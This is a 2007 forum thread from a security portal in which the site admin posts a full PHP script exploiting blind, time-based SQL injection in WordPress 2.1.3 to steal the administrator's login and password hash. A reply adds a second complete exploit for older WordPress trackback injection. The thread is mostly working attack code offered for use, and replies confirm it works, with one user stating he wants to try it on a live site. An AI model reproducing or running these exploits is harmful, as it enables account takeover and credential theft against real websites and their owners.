Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 17, 2014
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: Lokesh
New Today: 0
New Yesterday: 0
Overall: 8982

People Online:
Visitors: 230
Members: 0
Total: 230
milw0rm
·[web applications] - RunCMS 1.6.1 - (pm.class.php) Multiple SQL Injection Vulnerabilities
·[web applications] - csUpload Script Site - Authentication Bypass Vulnerability
·[web applications] - QuickCms 5.4 - Multiple Vulnerabilites
·[dos / poc] - Heartbleed User Session Extraction Exploit
·[dos / poc] - Asterisk 1.x - BYE Message Remote Denial of Service Vulnerability
·[remote exploits] - Vtiger Install Unauthenticated Remote Command Execution Exploit
·[remote exploits] - MS14-017 Microsoft Word RTF Object Confusion Exploit
·[remote exploits] - BlackBerry Z 10 Buffer Overflow Vulnerability
·[remote exploits] - Sun Java Runtime Environment 1.6 - WebStart JNLP File Stack Buffer Overflow
·[remote exploits] - GSC Client 1.00 2067 - Privilege Escalation Vulnerability

read more...
PacketStorm News
·FreeBSD Security Advisory - OpenSSL Issues
·FreeBSD Security Advisory - NFS Server Deadlock
·Cisco Security Advisory 20140409-asa
·Cisco Security Advisory 20140409-heartbleed
·Mandriva Linux Security Advisory 2014-067
·Slackware Security Advisory - openssl Updates
·Red Hat Security Advisory 2014-0380-01
·Red Hat Security Advisory 2014-0389-01
·Red Hat Security Advisory 2014-0383-01
·Red Hat Security Advisory 2014-0382-01

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> WordPress 2.1.3 sql injection blind fishing exploit ver. 2 Goto page 1, 2, 3, 4  Next
Post new topic  Reply to topic View previous topic :: View next topic 
WordPress 2.1.3 sql injection blind fishing exploit ver. 2
PostPosted: Wed May 23, 2007 12:25 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




So this is the new version of the WordPress 2.1.3 sql injection blind fishing exploit. This time it can steal from target database not only md5 hash, but user login too.

For using this exploit you need:

1. working php installation
2. run this script as php CLI
3. modify needed parameters in script beginning

Code:

<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// original version released - 21. may 2007
// added login retrieving - 23. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
$get_hash = true;// md5 hash retrieving - true or false
$get_login = true;// user login retrieving - true or false
//======================================================================

echo "\n\nWordPress 2.1.3 blind sql injection exploit by waraxe \n\n";
echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
   $suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

if($get_hash)
{
   echo "trying to get md5 hash from target \n";
   $hash = get_hash();
}

if($get_login)
{
   echo "trying to get user login from target \n";
   $login = get_login();
}

add_line("Target: $url");
add_line("User ID: $id");
if($get_login)
{
   add_line("Login: $login");
}
if($get_hash)
{
   add_line("Hash: $hash");
}

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_login()
{
   $field = 'user_login';
   $out = '';
   
   echo "first we need user login length ... \n";
   $len = get_length($field, 60);
   echo "user login length is $len chars\n";
   echo "finding user login now ...\n";
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_anychar($field,$i);
      echo "got $field pos $i --> $ch\n";
      $out .= "$ch";
      echo "current value for $field: $out \n";
   }
   
   echo "\nFinal result: $field=$out\n\n";

   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_length($field, $maxlen = 60)
{
   global $prefix, $suffix, $id, $testcnt;
   $len = 0;
   $cnt = $testcnt * 4;
   $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
   $ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH($field)%s,BENCHMARK($cnt,MD5(1337)),3)/*";
   
   $min = 0;
   $max = $maxlen;
   echo "starting $field length retrieve\n";

   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $inj = sprintf($ipattern, $prefix, $id, "=$max");
         $post = sprintf($ppattern, $suffix, $inj, $suffix);
         $eq = test_condition($post);
         
         if($eq)
         {
            $len = $max;
         }
         else
         {
            $len = $min;
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $inj = sprintf($ipattern, $prefix, $id, ">$curr");
      $post = sprintf($ppattern, $suffix, $inj, $suffix);
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      echo "curr: $curr--$max--$min\n";
   }
   
   return $len;
   
}
///////////////////////////////////////////////////////////////////////
function get_hash()
{
   $len = 32;
   $field = 'user_pass';
   $out = '';
   
   echo "finding hash now ...\n";
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_hashchar($field,$i);
      echo "got $field pos $i --> $ch\n";
      $out .= "$ch";
      echo "current value for $field: $out \n";
   }
   
   echo "\nFinal result: $field=$out\n\n";
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_anychar($field,$pos)
{
   global $prefix, $suffix, $id, $testcnt;
   $char = '';
   $cnt = $testcnt * 4;
   $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
   $ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

   $min = 32;
   $max = 255;
   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $inj = sprintf($ipattern, $prefix, $id, "=$max");
         $post = sprintf($ppattern, $suffix, $inj, $suffix);
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $inj = sprintf($ipattern, $prefix, $id, ">$curr");
      $post = sprintf($ppattern, $suffix, $inj, $suffix);
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      echo "curr: $curr--$max--$min\n";
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
   global $prefix, $suffix, $id, $testcnt;
   $char = '';
   $cnt = $testcnt * 4;
   $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
   $ipattern = " UNION ALL SELECT 1,2,$field,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

   // First let's determine, if it's number or letter
   $inj = sprintf($ipattern, $prefix, $id, ">57");
   $post = sprintf($ppattern, $suffix, $inj, $suffix);
   $letter = test_condition($post);
   
   if($letter)
   {
      $min = 97;
      $max = 102;
      echo "char to find is [a-f]\n";
   }
   else
   {
      $min = 48;
      $max = 57;
      echo "char to find is [0-9]\n";
   }

   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $inj = sprintf($ipattern, $prefix, $id, "=$max");
         $post = sprintf($ppattern, $suffix, $inj, $suffix);
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $inj = sprintf($ipattern, $prefix, $id, ">$curr");
      $post = sprintf($ppattern, $suffix, $inj, $suffix);
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      echo "curr: $curr--$max--$min\n";
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
   global $url, $norm_delay;
   $bret = false;
   $maxtry = 10;
   $try = 1;
   
   while(1)
   {
      $start = getmicrotime();
      $buff = make_post($url, $p);
      $end = getmicrotime();
   
      if($buff === '-1')
      {
         break;
      }
      else
      {
         echo "test_condition() - try $try - invalid return value ...\n";
         $try ++;
         if($try > $maxtry)
         {
            die("too many tries - exiting ...\n");
         }
         else
         {
            echo "trying again - try $try ...\n";
         }
      }
   }
   
   $diff = $end - $start;
   $delay = intval($diff * 10);
   
   if($delay > ($norm_delay * 2))
   {
      $bret = true;
   }
   
   return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
   $fa = test_md5delay(1);
   echo "$fa\n";
   $sa = test_md5delay($testcnt);
   echo "$sa\n";
   $fb = test_md5delay(1);
   echo "$fb\n";
   $sb = test_md5delay($testcnt);
   echo "$sb\n";
   $fc = test_md5delay(1);
   echo "$fc\n";
   $sc = test_md5delay($testcnt);
   echo "$sc\n";
   
   $mean_nondelayed = intval(($fa + $fb + $fc) / 3);
   echo "mean nondelayed - $mean_nondelayed dsecs\n";
   $mean_delayed = intval(($sa + $sb + $sc) / 3);
   echo "mean delayed - $mean_delayed dsecs\n";
   
   return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
   global $url, $id, $prefix, $suffix;
   
   // delay in deciseconds
   $delay = -1;
   $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
   $ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
   $inj = sprintf($ipattern, $prefix, $id, $cnt);
   $post = sprintf($ppattern, $suffix, $inj, $suffix);

   $start = getmicrotime();
   $buff = make_post($url, $post);
   $end = getmicrotime();
   
   if(intval($buff) !== -1)
   {
      die("test_md5delay($cnt) - invalid return value, exiting ...");
   }

   $diff = $end - $start;
   $delay = intval($diff * 10);

   return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
    list($usec, $sec) = explode(" ", microtime());
    return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt ($ch, CURLOPT_URL, $url);
   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
   
   if(!empty($cookie))
   {
      curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt ($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt ($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt ($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
   global $outfile;
   
   $buf .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $buf);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
?>


Feedback is welcome!

Enjoy Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun May 27, 2007 2:53 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Working great.Thank you. Wink
View user's profile Send private message
PostPosted: Mon May 28, 2007 9:31 am Reply with quote
zoiz
Beginner
Beginner
 
Joined: Mar 23, 2007
Posts: 4




thanks..nice xD~ works for me.
View user's profile Send private message
PostPosted: Wed May 30, 2007 12:54 pm Reply with quote
barr0w
Regular user
Regular user
 
Joined: May 30, 2007
Posts: 13




Yesterday I built a LAMP box with PHP/CURL just to try this exploit out. It works PERFECTLY. I just wanted to say great work and thank you. Now if I was just more skilled at md5 hacking I'd be all set hahahah.
View user's profile Send private message Send e-mail
PostPosted: Wed May 30, 2007 2:13 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




It's nice to hear positive feedback Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed May 30, 2007 4:08 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




В Естонии кажется по русский умеют говорить.А может и ошибаюсь.
Все очень хорошо написал и работает класно.Молодец.
View user's profile Send private message
PostPosted: Fri Jun 01, 2007 12:10 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




koko wrote:
В Естонии кажется по русский умеют говорить.А может и ошибаюсь.
Все очень хорошо написал и работает класно.Молодец.


Thanks for feedback. Good to hear, that script works as expected.

Pro russkii -- eto ja umeju deistvitelno v kakomtom mere Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jun 01, 2007 5:51 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Working people working scripts Laughing

И по русский сморю хорошо пишеш.Молодец. Laughing
View user's profile Send private message
PostPosted: Sat Jun 02, 2007 12:01 am Reply with quote
mimic
Beginner
Beginner
 
Joined: Jun 02, 2007
Posts: 2




The 2.2 version is also affected?
View user's profile Send private message
PostPosted: Sat Jun 02, 2007 1:14 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




mimic wrote:
The 2.2 version is also affected?


Nope, 2.2 is immune Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jun 02, 2007 9:44 am Reply with quote
scoobydoo
Regular user
Regular user
 
Joined: Jun 02, 2007
Posts: 5




this exploit works in all < 2.1.3 versions?
View user's profile Send private message
PostPosted: Sat Jun 02, 2007 1:28 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




No.In old versions file admin-ajax.php missing.

For old versions try this exploit.

Code:
<?php
print_r('
---------------------------------------------------------------------------
Wordpress <= 2.0.6 wp-trackback.php Zend_Hash_Del_Key_Or_Index /
/ sql injection admin hash disclosure exploit
(needs register_globals=on, 4 <= PHP < 4.4.3,< 5.1.4)
by rgod
dork: "is proudly powered by WordPress"
mail: retrog at alice dot it
site: http://retrogod.altervista.org
---------------------------------------------------------------------------
');

if ($argc<3) {
    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to wordpress
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
 -t[prefix]:  specify a table prefix (default: wp_)
Example:
php '.$argv[0].' localhost /wordpress/ -P1.1.1.1:80
php '.$argv[0].' localhost / -p81
---------------------------------------------------------------------------
');
    die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="wp_";

for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
  $prefix=str_replace("-t","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters

function my_encode($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}

echo "\npwd hash   -> ";
$j=1;$password="";
while (!strstr($password,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
        if (in_array($i,$chars))
        {
        $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_pass,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";
          $data ="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
          $data.="$sql\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e--\r\n";
          $packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii($packet);
          if (!eregi("trackbacks are closed",$html)) {$password.=chr($i);echo chr($i);sleep(1);break;}
        }
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}
echo "\n";

echo "admin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
    for ($i=0; $i<=255; $i++)
    {
          $sql="999999/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(user_login,".$j.",1))=".$i."),".my_encode("open").",".my_encode("sun-tzu")."))/**/FROM/**/".$prefix."users/**/WHERE/**/ID=1/*";
          $data ="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"title\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"url\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"blog_name\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"tb_id\";\r\n\r\n";
          $data.="$sql\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"1740009377\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e\r\n";
          $data.="Content-Disposition: form-data; name=\"496546471\";\r\n\r\n";
          $data.="1\r\n";
          $data.="-----------------------------7d61bcd1f033e--\r\n";
          $packet ="POST ".$p."wp-trackback.php?tb_id=1 HTTP/1.0\r\n";
          $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n";
          $packet.="Host: ".$host."\r\n";
          $packet.="Content-Length: ".strlen($data)."\r\n";
          $packet.="Connection: Close\r\n\r\n";
          $packet.=$data;
          sendpacketii($packet);
          if (!eregi("trackbacks are closed",$html)) {$admin.=chr($i);echo chr($i);sleep(1);break;}
        if ($i==255) {
            die("\nExploit failed...");
        }
    }
$j++;
}
echo "\n";

function is_hash($hash)
{
 if (ereg("([a-f0-9]{32})",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
  echo "exploit succeeded...";
}
else {
  echo "exploit failed...";
  }

?>

# milw0rm.com [2007-01-10]
View user's profile Send private message
PostPosted: Sat Jun 02, 2007 5:45 pm Reply with quote
scoobydoo
Regular user
Regular user
 
Joined: Jun 02, 2007
Posts: 5




hello koko thanks... but how do i actually use this? does this script required a ssh? and it does not have a place where to specify the host, etc etc like waraxe pasted above... can u pls paste another of the same script where i can specify to test it or can u tell me example? like what to change in the script? say i want to test it with example.com ...
View user's profile Send private message
PostPosted: Sat Jun 02, 2007 5:50 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Install php on your PC and run the script.Easy. Laughing Laughing Laughing
View user's profile Send private message
PostPosted: Sat Jun 02, 2007 6:11 pm Reply with quote
scoobydoo
Regular user
Regular user
 
Joined: Jun 02, 2007
Posts: 5




i want to test in a live wordpress site Very Happy Evil or Very Mad and when i run that script it says error
View user's profile Send private message
WordPress 2.1.3 sql injection blind fishing exploit ver. 2
  www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 4  
Goto page 1, 2, 3, 4  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Movie Reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.119 Seconds